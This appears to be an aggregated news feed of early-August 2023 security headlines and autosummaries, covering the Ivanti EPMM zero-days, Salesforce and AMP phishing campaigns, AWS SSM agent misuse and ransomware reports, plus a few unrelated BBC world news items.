            Serco Inc, the Americas division of multinational outsourcing company Serco Group, has disclosed a data breach after attackers stole the personal information of over 10,000 individuals from a third-party vendor's MoveIT managed file transfer (MFT) server. [...] "

            Autosummary: Serco's client roster includes a long list of U.S. federal agencies, including the Departments of Homeland Security, Justice, and State, as well as U.S. Intelligence Agencies and multiple U.S. Armed Forces branches (e.g., Navy, Army, Marine Corps, Air Force). "


            FAQ: How does Malwarebytes ransomware rollback work?

            exploits ransomware
            2023-08-03 https://www.malwarebytes.com/blog/business/2023/08/faq-how-does-malwarebytes-ransomware-rollback-work

            Categories: Business

            Malwarebytes Ransomware Rollback rescues your data from encryption by effectively “turning back the clock” of a ransomware attack. But how does it work, exactly?


            The post FAQ: How does Malwarebytes ransomware rollback work? appeared first on Malwarebytes Labs.

            "

            Autosummary: Ransomware rollback preemptively backs up all file types including pictures, documents, JSON/XML configurations, EXEs, unless they are explicitly excluded, globally excluded, or exceed the maximum file size. For every file modified, e.g., documents, pictures, etc., space for a copy is required. Prevention alone, it seems, can only take us so far, so when ransomware hits, organizations need a way to emerge safely from the fallout, data intact. To recap, Malwarebytes Ransomware Rollback is a last-resort recovery tool within Malwarebytes EDR, designed for swift recovery after other defense layers have been compromised. "


            Global ransomware attacks at an all-time high, shows latest 2023 State of Ransomware report

            exploits government ransomware
            2023-08-03 https://www.malwarebytes.com/blog/threat-intelligence/2023/08/global-ransomware-attacks-at-an-all-time-high-shows-latest-2023-state-of-ransomware-report

            Categories: Threat Intelligence

            Ransomware gangs are also starting to focus on exploiting zero-days for initial access.


            The post Global ransomware attacks at an all-time high, shows latest 2023 State of Ransomware report appeared first on Malwarebytes Labs.

            "

            Autosummary: A New Threat on the Horizon: CL0P. For a year and a half, LockBit, which claims to have 100 affiliates, has been the most dominant form of “Ransomware-as-a-Service” (RaaS) in the US, averaging about 24 attacks per month. "


            Phishing campaigns are using AMP URLs to avoid detection

            financial
            2023-08-03 https://www.malwarebytes.com/blog/news/2023/08/phishing-campaigns-found-to-be-using-amp-urls-to-avoid-detection

            Categories: Awareness

            Categories: News

            Tags: phishing

            Tags: amp

            Tags: url

            Tags: captcha

            Tags: redirection

            Researchers have found a new phishing tactic that uses Google Accelerated Mobile Pages (AMP) URLs to look trustworthy


            The post Phishing campaigns are using AMP URLs to avoid detection appeared first on Malwarebytes Labs.

            "

            Autosummary: Researchers have found a new phishing tactic which uses Google Accelerated Mobile Pages (AMP) to make URLs look trustworthy. Phishing attacks often seem to come from people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


            Rapid7 found a bypass for the recently patched actively exploited Ivanti EPMM bug

            exploits
            2023-08-03 https://securityaffairs.com/149116/security/ivanti-epmm-bypass-cve-2023-35082.html

            Researchers discovered a bypass for a recently fixed actively exploited vulnerability in Ivanti Endpoint Manager Mobile (EPMM). Rapid7 cybersecurity researchers have discovered a bypass for the recently patched actively exploited vulnerability in Ivanti Endpoint Manager Mobile (EPMM). The new vulnerability, tracked as CVE-2023-35082 (CVSS score: 10.0), can be exploited by unauthenticated attackers to access the API in […]

            The post Rapid7 found a bypass for the recently patched actively exploited Ivanti EPMM bug appeared first on Security Affairs.

            "

            Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, Ivanti EPMM) "


            Russian APT29 conducts phishing attacks through Microsoft Teams

            financial rusia-ucrania
            2023-08-03 https://securityaffairs.com/149103/apt/apt29-microsoft-teams-phishing-attacks.html

            Russia-linked APT29 group targeted dozens of organizations and government agencies worldwide with Microsoft Teams phishing attacks. Microsoft Threat Intelligence reported that Russia-linked cyberespionage group APT29  (aka SVR group, Cozy Bear, Nobelium, Midnight Blizzard, and The Dukes) carried out Microsoft Teams phishing attacks aimed at dozens of organizations and government agencies worldwide. APT29 along with APT28 cyber espionage group was involved in […]

            The post Russian APT29 conducts phishing attacks through Microsoft Teams appeared first on Security Affairs.

            "

            Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, APT29) "


            Amazon rainforest: Deforestation in Brazil at six-year low

            latam
            2023-08-03 https://www.bbc.co.uk/news/world-latin-america-66393360?at_medium=RSS&at_campaign=KARANGA
            Data shows a 66% drop in deforestation rates in July 2023 compared to the same month last year. "

            Autosummary: "


            Mexico bus crash: 15 dead in Nayarit ravine plunge

            latam
            2023-08-03 https://www.bbc.co.uk/news/world-latin-america-66395591?at_medium=RSS&at_campaign=KARANGA
            The bus crashed off the highway early on Thursday in the coastal state of Nayarit. "

            Autosummary: "


            Worldcoin suspended in Kenya as thousands queue for free money

            financial
            2023-08-03 https://www.bbc.co.uk/news/world-africa-66383325?at_medium=RSS&at_campaign=KARANGA
            The authorities say they have data privacy concerns over Sam Altman's new cryptocurrency project. "

            Autosummary: "


            67% of data breaches start with a single click

            financial
            2023-08-02 https://www.helpnetsecurity.com/2023/08/02/cybercriminals-sophisticated-tactics/

            Technology is accelerating faster than it ever has before, giving IT and security teams more tools to fend off cybersecurity attacks from an increasingly diverse slate of bad actors, according to Comcast Business. Cybercriminals employ sophisticated tactics: however, the tactics cybercriminals are using to access systems are also growing more sophisticated by the day. Access to armies of botnets and sprawling lists of customer data are just a few clicks away on the dark web. … More

            The post 67% of data breaches start with a single click appeared first on Help Net Security.

            "

            Autosummary: “No organization has perfect security, but everyone needs to understand their cybersecurity risks and build a plan to address the threats and trends the industry is experiencing,” said Shena Seneca Tharnish, VP, Secure Networking and Cyber Security Solutions, Comcast Business. "


            Iranian Company Cloudzy Accused of Aiding Cybercriminals and Nation-State Hackers

            government ciber
            2023-08-02 https://thehackernews.com/2023/08/iranian-company-cloudzy-accused-of.html
            Services offered by an obscure Iranian company known as Cloudzy are being leveraged by multiple threat actors, including cybercrime groups and nation-state crews. "Although Cloudzy is incorporated in the United States, it almost certainly operates out of Tehran, Iran – in possible violation of U.S. sanctions – under the direction of someone going by the name Hassan Nozari," Halcyon said in a "

            Autosummary: "


            Norwegian Entities Targeted in Ongoing Attacks Exploiting Ivanti EPMM Vulnerability

            exploits
            2023-08-02 https://thehackernews.com/2023/08/norwegian-entities-targeted-in-ongoing.html
            Advanced persistent threat (APT) actors exploited a recently disclosed critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) as a zero-day since at least April 2023 in attacks directed against Norwegian entities, including a government network. The disclosure comes as part of a new joint advisory released by the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian "

            Autosummary: "


            ClearSale Brand Protection combats phishing, fake accounts, and counterfeit products

            financial
            2023-08-02 https://www.helpnetsecurity.com/2023/08/02/clearsale-brand-protection/

            ClearSale launched its new Brand Protection platform. Brand Protection by ClearSale uses AI and digital intelligence to continuously scan for and report brand impersonation attacks such as fake social profiles, ads, and websites; counterfeit products; and phishing attacks. “ClearSale has worked at the forefront of CNP fraud prevention for more than 20 years, helping many of the world’s most recognized brands prevent chargebacks and false declines,” said Rafael Lourenco, EVP and Partner at ClearSale. “With … More

            The post ClearSale Brand Protection combats phishing, fake accounts, and counterfeit products appeared first on Help Net Security.

            "

            Autosummary: "


            Researchers Uncover AWS SSM Agent Misuse as a Covert Remote Access Trojan

            exploits
            2023-08-02 https://thehackernews.com/2023/08/researchers-uncover-aws-ssm-agent.html
            Cybersecurity researchers have discovered a new post-exploitation technique in Amazon Web Services (AWS) that allows the AWS Systems Manager Agent (SSM Agent) to be run as a remote access trojan on Windows and Linux environments "The SSM agent, a legitimate tool used by admins to manage their instances, can be re-purposed by an attacker who has achieved high privilege access on an endpoint with "

            Autosummary: "


            Amazon's AWS SSM agent can be used as post-exploitation RAT malware

            exploits
            2023-08-02 https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/
            Researchers have discovered a new post-exploitation technique in Amazon Web Services (AWS) that allows hackers to use the platform's System Manager (SSM) agent as an undetectable Remote Access Trojan (RAT). [...] "

            Autosummary: "We found a unique way to abuse the SSM service, allowing it to function seamlessly as a fully integrated trojan infrastructure, making the agent in the endpoint to communicate with different AWS account (which can be used by the attacker) than the original AWS account," explains Mitiga. "By executing commands from a separate, maliciously owned AWS account, the actions carried out by the SSM agent will remain hidden within the original AWS account, making the process of detecting the malicious activity cumbersome. "


            Hackers exploited Salesforce zero-day in Facebook phishing attack

            financial exploits
            2023-08-02 https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/
            Hackers exploited a zero-day vulnerability in Salesforce's email services and SMTP servers to launch a sophisticated phishing campaign targeting valuable Facebook accounts. [...] "

            Autosummary: The observed attack chain (Guardio Labs). Meta still investigating: after confirming the issues by replicating the creation of a Salesforce-branded address capable of disseminating phishing emails, Guardio Labs notified the vendor of their discovery on June 28, 2023. Salesforce reproduced the vulnerability and resolved the problem exactly a month later, on July 28, 2023. "


            Salesforce and Meta suffer phishing campaign that evades typical detection methods

            financial
            2023-08-02 https://www.helpnetsecurity.com/2023/08/02/salesforce-phishing-campaign/

            The Guardio research team discovered an email phishing campaign exploiting a zero-day vulnerability in Salesforce’s legitimate email services and SMTP servers. Phishing email sample as was sent from the “@salesforce.com” email address. The vulnerability allowed threat actors to craft targeted phishing emails, evading conventional detection methods by leveraging Salesforce’s domain and reputation and exploiting legacy quirks in Facebook’s web games platform. 83% of organizations face phishing attacks every year, and mass-market emails are the most … More

            The post Salesforce and Meta suffer phishing campaign that evades typical detection methods appeared first on Help Net Security.

            "

            Autosummary: "


            Attackers can turn AWS SSM agents into remote access trojans

            exploits
            2023-08-02 https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/

            Mitiga researchers have documented a new post-exploitation technique attackers can use to gain persistent remote access to AWS Elastic Compute Cloud (EC2) instances (virtual servers), as well as to non-EC2 machines (e.g., on-premises enterprise servers and virtual machines, and VMs in other cloud environments). The success of this “living off the land” technique hinges on: (1) attackers gaining initial access to the machine (e.g., by exploiting an unpatched vulnerability on a public-facing instance/server), and (2) the presence … More

            The post Attackers can turn AWS SSM agents into remote access trojans appeared first on Help Net Security.

            "

            Autosummary: The success of this “living off the land” technique hinges on: (1) attackers gaining initial access to the machine (e.g., by exploiting an unpatched vulnerability on a public-facing instance/server), and (2) the presence of the SSM Agent, a software component that enterprise sysadmins use to manage the endpoints from the AWS account using the AWS System Manager service. “After controlling the SSM Agent, the attackers can carry out malicious activities, such as data theft, encrypting the filesystem (as a ransomware), misusing endpoint resources for cryptocurrency mining and attempting to propagate to other endpoints within the network – all under the guise of using a legitimate software, the SSM Agent,” Mitiga researchers Ariel Szarf and Or Aspir explained. "


            Russian Cyber Adversary BlueCharlie Alters Infrastructure in Response to Disclosures

            rusia-ucrania
            2023-08-02 https://thehackernews.com/2023/08/russian-cyber-adversary-bluecharlie.html
            A Russia-nexus adversary has been linked to 94 new domains, suggesting that the group is actively modifying its infrastructure in response to public disclosures about its activities. Cybersecurity firm Recorded Future linked the new infrastructure to a threat actor it tracks under the name BlueCharlie, a hacking crew that's broadly known by the names Blue Callisto, Callisto (or Calisto), "

            Autosummary: "While the group uses relatively common techniques to conduct attacks (such as the use of phishing and a historical reliance on open-source offensive security tools), its likely continued use of these methods, determined posture, and progressive evolution of tactics suggests the group remains formidable and capable," the company said. "


            Industrial Control Systems Vulnerabilities Soar: Over One-Third Unpatched in 2023

            industry
            2023-08-02 https://thehackernews.com/2023/08/industrial-control-systems.html
            About 34% of security vulnerabilities impacting industrial control systems (ICSs) that were reported in the first half of 2023 have no patch or remediation, registering a significant increase from 13% the previous year. According to data compiled by SynSaber, a total of 670 ICS product flaws were reported via the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in the first half of "

            Autosummary: Some of the other notable findings are as follows: Mitsubishi Electric (20.5%), Siemens (18.2%), and Rockwell Automation (15.9%) were the most impacted vendors in the critical manufacturing sector; Hitachi Energy (39.5%), Advantech (10.5%), Delta Electronics, and Rockwell Automation (both 7.9%) were the most impacted vendors in the energy sector; Siemens emerged as the leading entity producing the most CVEs through the first half of 2023, accounting for 41 ICS advisories; use after free, out-of-bounds read, improper input validation, out-of-bounds write, and race condition were the top five software weaknesses. "


            Phishers Exploit Salesforce's Email Services Zero-Day in Targeted Facebook Campaign

            exploits
            2023-08-02 https://thehackernews.com/2023/08/phishers-exploit-salesforces-email.html
            A sophisticated Facebook phishing campaign has been observed exploiting a zero-day flaw in Salesforce's email services, allowing threat actors to craft targeted phishing messages using the company's domain and infrastructure. "Those phishing campaigns cleverly evade conventional detection methods by chaining the Salesforce vulnerability and legacy quirks in Facebook's Web Games platform,"

            Autosummary: "This triggers the verification flow that sends the email to this routing address, ending up as a new task in our system," the researchers said, adding it leads to a scenario where a salesforce.com email address can be verified simply by clicking on the link accompanying the request to add the actor-controlled address.


            Russian hackers target govt orgs in Microsoft Teams phishing attacks

            financial rusia-ucrania
            2023-08-02 https://www.bleepingcomputer.com/news/security/russian-hackers-target-govt-orgs-in-microsoft-teams-phishing-attacks/
            Microsoft says a hacking group tracked as APT29 and linked to Russia's Foreign Intelligence Service (SVR) targeted dozens of organizations worldwide, including government agencies, in Microsoft Teams phishing attacks. [...]

            Autosummary: "The organizations targeted in this activity likely indicate specific espionage objectives by Midnight Blizzard directed at government, non-government organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors."


            Ivanti discloses new critical auth bypass bug in MobileIron Core

            exploits
            2023-08-02 https://www.bleepingcomputer.com/news/security/ivanti-discloses-new-critical-auth-bypass-bug-in-mobileiron-core/
            IT software company Ivanti disclosed today a new critical security vulnerability in its MobileIron Core mobile device management software. [...]

            Autosummary: Cybersecurity firm Rapid7, which discovered and reported the bug, provides indicators of compromise (IOCs) to help defenders detect signs of a CVE-2023-35082 attack and urges Ivanti customers to update MobileIron Core software to the latest version immediately. Similar Ivanti bugs exploited in attacks since April: Two other security flaws in Ivanti's Endpoint Manager Mobile (EPMM) (formerly MobileIron Core) have been exploited by state hackers since April, according to a CISA advisory published on Tuesday.


            Minecraft fans beware: Players and servers at risk from BleedingPipe vulnerability

            exploits
            2023-08-02 https://www.malwarebytes.com/blog/news/2023/08/minecraft-mod-fans-beware-players-and-servers-at-risk-from-bleedingpipe-vulnerability

            Categories: Personal

            Tags: Minecraft, mod, forge, players, vulnerability, RCE, bleedingpipe, malware

            Minecraft players interested in modding are at risk from a remote code execution vulnerability targeting both players and servers.

            The post Minecraft fans beware: Players and servers at risk from BleedingPipe vulnerability appeared first on Malwarebytes Labs.

            Autosummary: From the Minecraft security (MMPA) article highlighting details of the attack: BleedingPipe is an exploit being used in the wild allowing FULL remote code execution on clients and servers running popular Minecraft mods on 1.7.10/1.12.2 Forge (other versions could also be affected), alongside some other mods. For players, the news isn’t particularly reassuring: As a player if you don’t play on servers, you are not affected.


            Ivanti patches second zero-day vulnerability being used in attacks

            exploits
            2023-08-02 https://www.malwarebytes.com/blog/news/2023/08/ivanti-patches-second-zero-day-vulnerability-actively-used-in-attacks

            Categories: Exploits and vulnerabilities, News

            Tags: Ivanti, EPMM, MobileIron, CVE-2023-35081, CVE-2023-35078, tomcat, arbitrary file write, ACL, upgrade

            Ivanti has issued a patch to address a second critical zero-day vulnerability

            The post Ivanti patches second zero-day vulnerability being used in attacks appeared first on Malwarebytes Labs.

            Autosummary: Posted: August 2, 2023. Ivanti has issued a patch to address a second critical zero-day vulnerability that is under active attack.


            2022 Top Routinely Exploited Vulnerabilities

            exploits
            2023-08-02 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a

            SUMMARY

            The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):

            • United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)
            • Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
            • Canada: Canadian Centre for Cyber Security (CCCS)
            • New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
            • United Kingdom: National Cyber Security Centre (NCSC-UK)

            This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.

            The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of compromise by malicious cyber actors.

            • Vendors, designers, and developers: Implement secure-by-design and -default principles and tactics to reduce the prevalence of vulnerabilities in your software.
              • Follow the Secure Software Development Framework (SSDF), also known as SP 800-218, and implement secure design practices into each stage of the software development life cycle (SDLC). As part of this, establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.

                Autosummary: PURPOSE This document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring. Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP. Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM). While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, widespread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. For more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default. TECHNICAL DETAILS Key Findings: In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products.


                Zero-day in Salesforce email services exploited in targeted Facebook phishing campaign

                financial exploits
                2023-08-02 https://securityaffairs.com/149083/hacking/phishing-facebook-campaign-salesforce-zero-day.html

                Experts spotted a spear-phishing Facebook campaign exploiting a zero-day vulnerability in Salesforce email services. Researchers from Guardio Labs uncovered a sophisticated phishing campaign exploiting a zero-day vulnerability in Salesforce email services and SMTP servers. The phishing campaigns are able to evade conventional detection methods by chaining the Salesforce vulnerability and legacy quirks in Facebook’s web […]

                The post Zero-day in Salesforce email services exploited in targeted Facebook phishing campaign appeared first on Security Affairs.


                CISA adds second Ivanti EPMM flaw to its Known Exploited Vulnerabilities catalog

                exploits
                2023-08-02 https://securityaffairs.com/149071/security/cisa-adds-second-ivanti-epmm-flaw-to-its-known-exploited-vulnerabilities-catalog.html

                US CISA added a second actively exploited Ivanti's Endpoint Manager Mobile (EPMM) vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added the second actively exploited Ivanti's Endpoint Manager Mobile (EPMM, formerly MobileIron Core) vulnerability, tracked as CVE-2023-35081, to its Known Exploited Vulnerabilities Catalog. “The Cybersecurity and Infrastructure Security […]

                The post CISA adds second Ivanti EPMM flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.


                Brazil police raids leave at least 45 people dead

                latam
                2023-08-02 https://www.bbc.co.uk/news/world-latin-america-66387599?at_medium=RSS&at_campaign=KARANGA
                Police have seized drugs and weapons following operations against drug gangs in three states.


                Brazil police rescue migrants after 14 days at sea on ship"s rudder

                latam
                2023-08-02 https://www.bbc.co.uk/news/world-latin-america-66384514?at_medium=RSS&at_campaign=KARANGA
                The Nigerian migrants hoped to travel to Europe, but ended up thousands of miles away in Brazil.


                Etsy U-turn in row over withholding sellers' money

                financial
                2023-08-02 https://www.bbc.co.uk/news/business-66387147?at_medium=RSS&at_campaign=KARANGA
                The online marketplace faced calls from sellers to boycott its site over money being held in reserve.


                The gap in users’ identity security knowledge gives cybercriminals an opening

                ciber
                2023-08-01 https://www.helpnetsecurity.com/2023/08/01/identity-security-knowledge/

                With exponential growth in the number of human and machine actors on the network and more sophisticated technology in more places, identity in this new era is rapidly becoming a super-human problem, according to RSA. Paradoxically, even in this world where AI can dynamically assess risks and automate responses to threats, humans will have an even more important and strategic role in cybersecurity and identity security. The report found significant gaps in respondents’ knowledge concerning … More

                The post The gap in users’ identity security knowledge gives cybercriminals an opening appeared first on Help Net Security.

                Autosummary: “The RSA’s report reveals why identity is one of the most susceptible ways for cybercriminals to breach an organization—users simply don’t understand identity’s full cybersecurity role, the risks that identity poses, or the ways to use identity to build safer organizations,” said RSA CEO Rohit Ghai.


                EU’s financial institutions face cyber resilience crisis

                financial
                2023-08-01 https://www.helpnetsecurity.com/2023/08/01/financial-institutions-cyber-risk/

                78% of Europe’s largest financial institutions experienced a third-party breach in the past year, according to SecurityScorecard. In the wake of attacks such as MOVEit and SolarWinds, cybersecurity regulations are increasing the need for comprehensive approaches to manage vendor risk and ensure compliance. 84% of financial institutions have been exposed to a fourth-party breach – illustrating how a vast web of unseen risks are hiding in plain sight. Visibility across the entire third-and fourth-party ecosystem … More

                The post EU’s financial institutions face cyber resilience crisis appeared first on Help Net Security.

                Autosummary: “If nearly 20% of the most well-resourced financial entities in the EU have grades of C or worse, then it’s likely that the overall cyber resilience for other financial entities is actually much lower,” said Matthew McKenna, Chief Sales Officer, SecurityScorecard.


                Stremio vulnerability exposes millions to attack

                exploits
                2023-08-01 https://www.helpnetsecurity.com/2023/08/01/stremio-vulnerability/

                CyFox researchers have discovered a DLL planting/hijacking vulnerability in popular media center application Stremio, which could be exploited by attackers to execute code on the victim’s system, steal information, and more. About the vulnerability: DLLs (dynamic link libraries) are files that can be dynamically linked and shared by multiple programs concurrently, and are crucial to Windows and many applications (including Stremio). “They house standard functions shared by various applications, preventing code duplication and reducing executable … More

                The post Stremio vulnerability exposes millions to attack appeared first on Help Net Security.

                Autosummary: Possible attacks: Nir Yehoshua, Chief Researcher and Team Leader at CyFox, says that to exploit this DLL planting/hijacking vulnerability, an attacker has to first gain unauthorized access to the victim’s system so they can transfer the malicious DLL file to the software’s path and then wait for the user to run the vulnerable software.


                Cybercriminals Renting WikiLoader to Target Italian Organizations with Banking Trojan

                financial exploits ciber
                2023-08-01 https://thehackernews.com/2023/08/cybercriminals-renting-wikiloader-to.html
                Organizations in Italy are the target of a new phishing campaign that leverages a new strain of malware called WikiLoader with an ultimate aim to install a banking trojan, stealer, and spyware called Ursnif (aka Gozi). "It is a sophisticated downloader with the objective of installing a second malware payload," Proofpoint said in a technical report. "The malware uses multiple mechanisms to evade


                Android n-day bugs pose zero-day threat

                exploits
                2023-08-01 https://www.helpnetsecurity.com/2023/08/01/android-zero-days/

                In the Android ecosystem, n-day vulnerabilities are almost as dangerous as zero-days, according to Google’s review of zero-days exploited in the wild in 2022. N-days functioning as zero-days: Zero-days are software bugs that are unknown to the vendor but known to – and exploited by – threat actors. They become n-days when their existence has been made public, with or without a patch being available. The problem is considerable in the Android ecosystem, since Google’s … More

                The post Android n-day bugs pose zero-day threat appeared first on Help Net Security.

                Autosummary: “Attackers can use the known n-day bug, but have it operationally function as a 0-day since it will work on all affected devices,” noted Maddie Stone, Security Researcher at Google’s Threat Analysis Group (TAG).


                US government outlines National Cyber Workforce and Education Strategy

                government
                2023-08-01 https://www.helpnetsecurity.com/2023/08/01/us-government-outlines-national-cyber-workforce-and-education-strategy/

                After the release of a National Cybersecurity Strategy and its implementation plan, the Biden-Harris Administration has unveiled the National Cyber Workforce and Education Strategy (NCWES), “aimed at addressing both immediate and long-term cyber workforce needs.” The National Cyber Workforce and Education Strategy: The ongoing cybersecurity skills shortage is a major threat to national, enterprise and consumer safety. “The NCWES emphasizes that no one actor can alone affect the needed change at scale. This means all … More

                The post US government outlines National Cyber Workforce and Education Strategy appeared first on Help Net Security.

                Autosummary: The NCWES aims to:
                • Equip every American with foundational cyber skills – digital literacy, computational literacy, and digital resilience – by providing learning opportunities to all and promoting the pursuit of foundational cyber skills and cyber careers
                • Transform cyber education by building and leveraging ecosystems to improve cyber education, expanding competency-based cyber education, investing in educators, and making cyber education and training more affordable and accessible
                • Expand and enhance the national cyber workforce by collaborating with a wide range of stakeholders, adopting a skills-based approach to recruitment and development, and increasing access to cyber jobs for all Americans
                • Strengthen the federal cyber workforce by communicating the benefits of careers in public service amongst both job seekers and current employees and lowering the barriers associated with hiring and onboarding
                “The NCWES envisions a skills-based digital future where workers have access to good-paying, middle-class cyber jobs within their communities,” the Administration noted.


                European Bank Customers Targeted in SpyNote Android Trojan Campaign

                financial exploits
                2023-08-01 https://thehackernews.com/2023/08/european-bank-customers-targeted-in.html
                Various European customers of different banks are being targeted by an Android banking trojan called SpyNote as part of an aggressive campaign detected in June and July 2023. "The spyware is distributed through email phishing or smishing campaigns and the fraudulent activities are executed with a combination of remote access trojan (RAT) capabilities and vishing attack," Italian cybersecurity

                Autosummary: Delivered to victims via WhatsApp, the app has features identical to those of SpyNote, requesting accessibility permissions and others to collect call logs, contacts, files, location, and SMS messages, as well as to install additional apps and steal data from Facebook Messenger, imo, Signal, Telegram, Viber, and WhatsApp.


                Cybercriminals train AI chatbots for phishing, malware attacks

                financial exploits ciber
                2023-08-01 https://www.bleepingcomputer.com/news/security/cybercriminals-train-ai-chatbots-for-phishing-malware-attacks/
                In the wake of WormGPT, a ChatGPT clone trained on malware-focused data, a new generative artificial intelligence hacking tool called FraudGPT has emerged, and at least another one is under development that is allegedly based on Google's AI experiment, Bard. [...]

                Autosummary: [Image: FraudGPT promoted on hacker forum (SlashNext)] Next-gen cybercrime chatbots: An investigation from researchers at cybersecurity company SlashNext reveals that CanadianKingpin12 is actively training new chatbots using unrestricted data sets sourced from the dark web or basing them on sophisticated large language models developed for fighting cybercrime.


                How to manage a mass password reset due to a ransomware attack

                exploits ransomware
                2023-08-01 https://www.bleepingcomputer.com/news/security/how-to-manage-a-mass-password-reset-due-to-a-ransomware-attack/
                Resetting the passwords for thousands of people after a ransomware attack is challenging, to say the least, for any IT team. Learn more from Specops Software on why organizations are forced into mass password resets and how to make the process manageable. [...]

                Autosummary: How to easily enable users to reset their own passwords: Ideally, a ransomware event doesn’t occur in the first place, but implementing solutions through proactive planning will save the IT staff and users valuable time and resources if it does. The burden mass password resets place on IT teams: As troublesome as a password reset is for users, it’s helpdesk and IT staff who deal with the burden of hugely increased call volumes and service tickets. As is typical in ransomware attacks, the University of Waterloo forced staff, faculty, and employee grad students to reset their passwords by June 8th.


                Mobb automates vulnerability remediations with AI-powered technology

                exploits
                2023-08-01 https://www.helpnetsecurity.com/2023/08/01/mobb-ai-technology/

                Mobb announced its AI-powered technology that automates vulnerability remediations to significantly reduce security backlogs and free developers to focus on innovation. Mobb ingests SAST results from various scanning tools and automatically fixes code, while keeping the developers informed during the process to instill trust and ensure accuracy. “We built technology that automatically fixes vulnerabilities in applications, in a way that is trusted by developers and security teams. All the steps and interactions are captured by … More

                The post Mobb automates vulnerability remediations with AI-powered technology appeared first on Help Net Security.


                Cisco adds automated ransomware recovery to its XDR solution

                exploits ransomware
                2023-08-01 https://www.helpnetsecurity.com/2023/08/01/cisco-xdr-capabilities/

                Cisco is enhancing its Extended Detection and Response (XDR) solution. By adding recovery to the response process, Cisco XDR is redefining what customers should expect from security products. This announcement brings near real-time recovery for business operations after a ransomware attack. Cisco continues to drive momentum towards its vision of the Cisco Security Cloud—a unified, AI-driven, cross-domain security platform. With the launch of Cisco XDR at the RSA Conference this year, Cisco delivered deep telemetry … More

                The post Cisco adds automated ransomware recovery to its XDR solution appeared first on Help Net Security.

                Autosummary: With the new capabilities in Cisco XDR, Security Operations Center (SOC) teams will be able to automatically detect, snapshot, and restore the business-critical data at the very first signs of a ransomware attack, often before it moves laterally through the network to reach high-value assets.


                Hackers use new malware to breach air-gapped devices in Eastern Europe

                exploits
                2023-08-01 https://www.bleepingcomputer.com/news/security/hackers-use-new-malware-to-breach-air-gapped-devices-in-eastern-europe/
                Chinese state-sponsored hackers have been targeting industrial organizations with new malware that can steal data from air-gapped systems. [...]

                Autosummary: [Image: Infection route for air-gapped systems (Kaspersky)] In May 2022, Kaspersky noticed an additional implant used in the APT31 attacks, designed to collect local files from breached systems.


                Threat actors abuse Google AMP for evasive phishing attacks

                financial
                2023-08-01 https://www.bleepingcomputer.com/news/security/threat-actors-abuse-google-amp-for-evasive-phishing-attacks/
                Security researchers are warning of increased phishing activity that abuses Google Accelerated Mobile Pages (AMP) to bypass email security measures and get to inboxes of enterprise employees. [...]

                Autosummary: [Image: Google AMP redirection to a phishing site (Cofense)] Data from anti-phishing protection company Cofense shows that the volume of phishing attacks employing AMP spiked significantly towards mid-July, suggesting that threat actors may be adopting the method.


                CISA issues new warning on actively exploited Ivanti MobileIron bugs

                exploits
                2023-08-01 https://www.bleepingcomputer.com/news/security/cisa-issues-new-warning-on-actively-exploited-ivanti-mobileiron-bugs/
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned today of state hackers exploiting two flaws in Ivanti's Endpoint Manager Mobile (EPMM), formerly MobileIron Core. [...]


                Threat Actors Exploiting Ivanti EPMM Vulnerabilities

                exploits
                2023-08-01 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a

                SUMMARY

                The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. Advanced persistent threat (APT) actors exploited CVE-2023-35078 as a zero day from at least April 2023 through July 2023 to gather information from several Norwegian organizations, as well as to gain access to and compromise a Norwegian government agency’s network.

